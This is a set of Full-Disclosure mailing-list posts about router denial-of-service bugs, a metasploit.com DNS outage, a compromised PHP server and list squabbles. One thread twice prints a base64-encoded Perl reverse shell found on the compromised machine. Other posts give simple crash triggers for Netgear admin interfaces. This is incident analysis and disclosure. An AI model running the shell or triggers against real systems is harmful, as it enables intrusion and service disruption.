Re: [Full-disclosure] sha1 sums
On Tue, Oct 25, 2011 at 6:51 AM, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote: 24405398b27585676f0191b493839e9c02f3ec5a file1 e676c17b21f5a96fe278c0cdb32152357d5e10f6 file2 A bit of netiquette and use the subject 'noise' for hashes. http://seclists.org/fulldisclosure/2011/Jul/21 http://seclists.org/fulldisclosure/2011/Oct/775 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
it could still be carried out remotely by obfuscating a link sent to the admin of the device. this would obviously rely on the admin clicking on the link, and is more of a phishing / social engineering style attack. this would also rely on the router being setup with all of the default internal LAN ip's. sr. 2009/6/16 Vladimir '3APA3A' Dubrovin 3ap...@security.nnov.ru Dear Tom Neaves, It still can be exploited from Internet even if remote management is only accessible from local network. If you can trick user to visit Web page, you can place a form on this page which targets to router and request to router is issued from victim's browser. --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com: TN Hi. TN I see where you're going but I think you're missing the point a little. By TN *default* the web interface is enabled on the LAN and accessible by anyone TN on that LAN and the remote management interface (for the Internet) is TN turned off. If the remote management interface was enabled, stopping ICMP TN echo responses would not resolve this issue at all, turning the interface TN off would do though (or restricting by IP, ...ack). The remote management TN (love those quotes...) interface speaks over HTTP hence TCP so no amount of TN dropping ICMP goodness will help with this. Anyhow, I am happy to discuss TN this off list with you if its still not clear to save spamming everyone's TN inboxes. :o) TN Tom TN - Original Message - TN From: Alaa El yazghi TN To: Tom Neaves TN Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk TN Sent: Monday, June 15, 2009 11:03 PM TN Subject: Re: Netgear DG632 Router Remote DoS Vulnerability TN I know and I understand. What I wanted to mean is that we can not eventually TN acces to the web interface of a netgear router remotely if we cannot localy. TN As for the DoS, it is simple to solve such attack from outside. We just TN disable receiving pings (There is actually an option in even the lowest TN series) and thus, we would be able to have a remote management without ICMP TN requests. TN 2009/6/15 Tom Neaves t...@tomneaves.co.uk TN Hi. TN I'm not quite sure of your question... TN The DoS can be carried out remotely, however one mitigating factor (which TN makes it a low risk as opposed to sirens and alarms...) is that its turned TN off by default - you have to explicitly enable it under Remote Management TN on the device if you want to access it/carry out the DoS over the Internet. TN However, it is worth noting that anyone on your LAN can *remotely* carry out TN this attack regardless of this management feature being on/off. TN I hope this clarifies it for you. TN Tom TN - Original Message - TN From: Alaa El yazghi TN To: Tom Neaves TN Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk TN Sent: Monday, June 15, 2009 10:45 PM TN Subject: Re: Netgear DG632 Router Remote DoS Vulnerability TN How can it be carried out remotely if it bugs localy? TN 2009/6/15 Tom Neaves t...@tomneaves.co.uk TN Product Name: Netgear DG632 Router TN Vendor: http://www.netgear.com TN Date: 15 June, 2009 TN Author: t...@tomneaves.co.uk t...@tomneaves.co.uk TN Original URL: TN http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt TN Discovered: 18 November, 2006 TN Disclosed: 15 June, 2009 TN I. DESCRIPTION TN The Netgear DG632 router has a web interface which runs on port 80. This TN allows an admin to login and administer the device's settings. However, TN a Denial of Service (DoS) vulnerability exists that causes the web interface TN to crash and stop responding to further requests. TN II. DETAILS TN Within the /cgi-bin/ directory of the administrative web interface exists TN a TN file called firmwarecfg. This file is used for firmware upgrades. A HTTP TN POST TN request for this file causes the web server to hang. The web server will TN stop TN responding to requests and the administrative interface will become TN inaccessible TN until the router is physically restarted. TN While the router will still continue to function at the network level, i.e. TN it will TN still respond to ICMP echo requests and issue leases via DHCP, an TN administrator will TN no longer be able to interact with the administrative web interface. TN This attack can be carried out internally within the network, or over the TN Internet TN if the administrator has enabled the Remote Management feature on the TN router. TN Affected Versions: Firmware V3.4.0_ap (others unknown) TN III. VENDOR RESPONSE TN 12 June, 2009 - Contacted vendor. TN 15 June, 2009 - Vendor responded. Stated the DG632 is an end of life TN product and is no TN longer supported in a production and development sense, as such, there will TN be no further TN firmware releases to resolve this issue. TN IV. CREDIT TN Discovered
Re: [Full-disclosure] ICQ 6 protocol bug?
ohthis reminds of the days subseven would send ICQ pager alertsahh...the gold 'ol days. On Sat, Feb 14, 2009 at 4:49 PM, valdis.kletni...@vt.edu wrote: On Sat, 14 Feb 2009 23:26:48 +0200, James Matthews said: ICQ is known to have a few remote bugs. I use meebo.com instead of a client due to these issues. At which point you're probably trading known bugs for unknown bugs. ;) Of course, this is a battle the user can't win. The other option is to toss the proprietary ICQ client and use some other open-source client like Pidgin - at which point you're trading known ICQ bugs for unknown Pidgin bugs. At that point, your best bet is to consider 2 things: 1) What client am I most likely to see actual attacks against? 2) What client am I the most worried about attacks? (Note the two don't have to be the same - widespread ICQ attacks may be more common, but maybe you worry more about getting hit with a Pidgin attack because it possibly means you're being targeted) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 1234567890 today
that just means it's the end of the world... On Fri, Feb 13, 2009 at 12:25 PM, the.soylent the.soyl...@gmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 hi.. according to http://en.wikipedia.org/wiki/Unixtime unixtime will have today the 'magic' number 1234567890 gratulations --- and who know where the party is? :) /soylent btw: sry 4 non-sec-posting... i know the list has enough to carry with that --- but... i know there are many geeks out there who wanna make a screenshot of that ;) -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFJla0IY86qEhC92cgRAtnnAKCqqexnryOG6fOE2BSyXTI+kPeBPQCfcGjY oNziULQOPJJL+TS07UjSXN0= =omrj -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] metasploit.com = 127.0.0.1
.org is now being affected as well. On Wed, Feb 11, 2009 at 3:11 AM, alessandro telami tel...@hotmail.com wrote: I'm seeing the same on my Network. Cyber-threats Date: Tue, 10 Feb 2009 16:08:38 -0600 From: vigilantgregor...@gmail.com To: static...@gmail.com CC: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] metasploit.com = 127.0.0.1 DDOS On Tue, Feb 10, 2009 at 4:05 PM, sr. static...@gmail.com wrote: anybody else seeing this? can't get to metasploit because it's currently resolving to 127.0.0.1 sr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Share your photos with Windows Live Photos - Free Try it Now! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] metasploit.com = 127.0.0.1
Well, i can resolve the IP's just fine. just can't connect to port 80. I'm the fw / network person at my job, and i don't remember adding a rule for this :-P I can get there just fine now, seemed inaccessible to me for a short time. thx all... fabrizio On Wed, Feb 11, 2009 at 11:00 AM, Michael Holstein michael.holst...@csuohio.edu wrote: that's all fine and dandy. still can't reach port 80. Have you tried using OpenDNS, etc. to see if it resolves? eg: host -t a www.metasploit.org *208.67.222.222 Perhaps your school/employeer/ISP has decided that Metasploit is off-limits. ~Mike.* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] connect back PHP hack
can anyone tell me what encoding this is? $back_connect=IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] connect back PHP hack
i really appreciate all of the responses. this is what community is all about. i'd seen the == in other encoding schemes, but just wasn't sure and wanted a quick response...thanks to everyone who responded! I'll post the rest of my findings on here asap. i'm looking into an old compromised machine. this is nothing new.. whoever mentioned the r57 shell, you're probably right as the script connects to a remote box @ port 11457. this is r57 behaviour. i also found a copy of the same script i'm dissecting on someone else's box, you can check it out here: http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php in my case, a bunch of php files were modified. i'll zip everything up and host it so you can all analyze... thx, sr. aka fabrizio siciliano On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro gcast...@gmail.com wrote: Sr. This is base64 encoded. 2009/2/10 sr. static...@gmail.com: can anyone tell me what encoding this is? $back_connect=IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==; this has to do with old php 4.x.x version with magic quotes enabled. i'm just trying to figure out what the connect back code does. any input is much appreciated. thx, sr. -- Saludos, Gustavo Castro Puig. E-Mail: gcast...@gmail.com LPI Level-1 Certified (https://www.lpi.org/es/verify.html LPID:LPI42304 Verification Code: hp6re8w5qg ) -BEGIN GEEK CODE BLOCK- Version: 3.12 GCS/CM/IT/ED dx s-:- a? C(+++)$ UL*$ P+ L(++)$ E--- W+++$ N+ o? K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++() DI+++ D++ G++ e++ h--- r y+++ --END GEEK CODE BLOCK-- Registered Linux User #69342 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] metasploit.com = 127.0.0.1
anybody else seeing this? can't get to metasploit because it's currently resolving to 127.0.0.1 sr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] metasploit.com = 127.0.0.1
thanks, metasploit.org is up. reading the blog now... On Tue, Feb 10, 2009 at 5:09 PM, Harry Hoffman hhoff...@ip-solutions.net wrote: yep, [hhoff...@localhost ~]$ host metasploit.com metasploit.com has address 127.0.0.1 metasploit.com mail is handled by 1 bogus.metasploit.com. metasploit.com mail is handled by 20 slug.metasploit.com. metasploit.com mail is handled by 30 core.metasploit.com. [hhoff...@localhost ~]$ host -t NS metasploit.com metasploit.com name server dns02.metasploit.com. metasploit.com name server dns01.metasploit.com. [hhoff...@localhost ~]$ host dns02.metasploit.com dns02.metasploit.com has address 66.240.213.81 [hhoff...@localhost ~]$ host 66.240.213.81 81.213.240.66.in-addr.arpa domain name pointer core.metasploit.com. On Tue, 2009-02-10 at 17:05 -0500, sr. wrote: anybody else seeing this? can't get to metasploit because it's currently resolving to 127.0.0.1 sr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Barack Obama -- Not Appropriate
sentiar? or sentier? watch it, you might be considered a troll...! On Thu, Jan 22, 2009 at 4:44 PM, j-f sentier j.sent...@gmail.com wrote: It's sad to get to this point, but it seems that an trisomic like you need this kind of speach to catch the puck. Look at your mailbox archives, no ones wants you here, it's not a myth. 2009/1/22 andrew.wallace andrew.wall...@rocketmail.com Your abusive language is unwanted here you mean. On Thu, Jan 22, 2009 at 8:30 P M, j-f sentier j.sent...@gmail.com wrote: yup globally a piece of shit, unwanted here. 2009/1/22 andrew.wallace andrew.wall...@rocketmail.com No, i'm here and there and everywhere. n3td3v is global. On Thu, Jan 22, 2009 at 8:14 PM, j-f sentier j.sent...@gmail.com wrote: Haha you still dreaming. Anyways, stay there and die. 2009/1/22 andrew.wallace andrew.wall...@rocketmail.com On Thu, Jan 22, 2009 at 7:37 PM, j-f sentier j.sent...@gmail.com wrote: Re-open your dummy mailing-list and leave this one. It was never closed, join. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Anybody having a mobile phone (Iphone, Nokia.) willing to test ?
i'll take one. my company tests a vast majority of phones for our GPS app which currently sits on a number of carriers. would love to check out your code. sr. Thu, Jan 15, 2009 at 5:40 PM, Ivan . ivan...@gmail.com wrote: yeah I do On Fri, Jan 16, 2009 at 3:12 AM, Thierry Zoller thie...@zoller.lu wrote: Hi, Anybody that has an Phone with a browser, Opera Mini, G1, Iphone willing to test a POC please contact me. -- http://secdev.zoller.lu Thierry Zoller ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] WTF people?
amazing how every message becomes tainted with bullshit. On Sun, Jan 11, 2009 at 6:01 PM, sexyazngr...@mac.hush.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 pics? On Sun, 11 Jan 2009 17:48:53 -0500 waveroad waveroad waver...@gmail.com wrote: N3td3v other alias spotted. 2009/1/11 sexyazngr...@mac.hush.com -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 i find the surname mcafee to be a turn-on here on the security mailing list, mister good hacker:))) a/s/l? On Sun, 11 Jan 2009 16:49:20 -0500 Will McAfee sec- commun...@thegoodhacker.com wrote: I have lurked for some time, and really, this list has become pathetic due to it's hiijacking by two or three trolls with nothing better to do than destroy the relevant signal to noise ratio. This list is not about MI5, the NSA, or Mossad unless there is something practical to be learned from them. I do not care about the information war between Russia and Georgia unless it is about the systems used. Think of this list as like a trade correspondence journal, not a public tackboard. Sent from my iPhone ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAklqcbUACgkQynWwk3/AtyOa+wP/YQJlJsabFMRjU8FEs6V+t4eEwkW 0 QHX6NsZkryCvIgNWKjPjCTq25n/sS8JKr9oKFJybeyhgY9ADMJ94rLspQU6pQetJnfk o rkmOnzyUOPzXdmBDJH/34qe3K55k8v7f7OeWLu3xosxWP8iWJwQWR2gXF11hELGJKbJ / 9Zzisvg= =cJJ3 -END PGP SIGNATURE- -- Click for free info on online doctorate degrees and make up to $250k/ year. http://tagline.hushmail.com/fc/PnY6qxudoSZgDEE0yj7ARzIKdHrLoCs88Zzh zE4rU3tdHkjzM8yso/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Version: Hush 3.0 Note: This signature can be verified at https://www.hushtools.com/verify wpwEAQMCAAYFAklqek0ACgkQynWwk3/AtyPcEgP8ClWXNKSO2PiPEUGhalNNnQD3LORX LxkxnMgYlCPb06v4unM1RSC4ohJZdX7T+bRrvNQdO9b0RsP34pkdCbCZavLMsxaZChbJ /ApjICH6vsajaRdu0ZEH5HjnfAwnYcVpAFKamfnP7h8Zyzgp9ZfHZv4ZEOYL9oHxh2NN CdQCXww= =Hgbn -END PGP SIGNATURE- -- Click for free info on business schools, $150K/ year potential. http://tagline.hushmail.com/fc/PnY6qxsZgJoEzGwoSheR0lZiwV2oU7O92zSQHsC8LzPC3isaZnbmg/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] This is WAR!
maybe i'm not getting the joke, but it's not escape - colon - i. it's escape - i is this the twilight zone? sr. On Sat, Jan 10, 2009 at 1:45 AM, Ed Carp e...@pobox.com wrote: I'm sure George doesn't even wash his hands after using emacs! The only reason you'd use escape - colon - i is because you are not a master, you are merely a novice at vi ... once you are exposed to the Zen of vi, you will never go back to the maya (illusion) that is emacs! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Netgear WGR614v9 DoS to Admin Interface (internal and external)
Not sure how to rate this, but at the same time, i really don't give a shit. (one of those days...) You can crash the admin interface by sending a malformed URL to the web interface of this wireless router. No recovery, a reboot fixes the issue. Wouldn't even really call it a malformed URL either, but whatever. e.g., http://192.168.1.1/? all you need to do is add a ? to the end of the URL. This is with the latest firmware from netgear's site. that's all folks. keep on talkin that smack you talk so well. sr. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/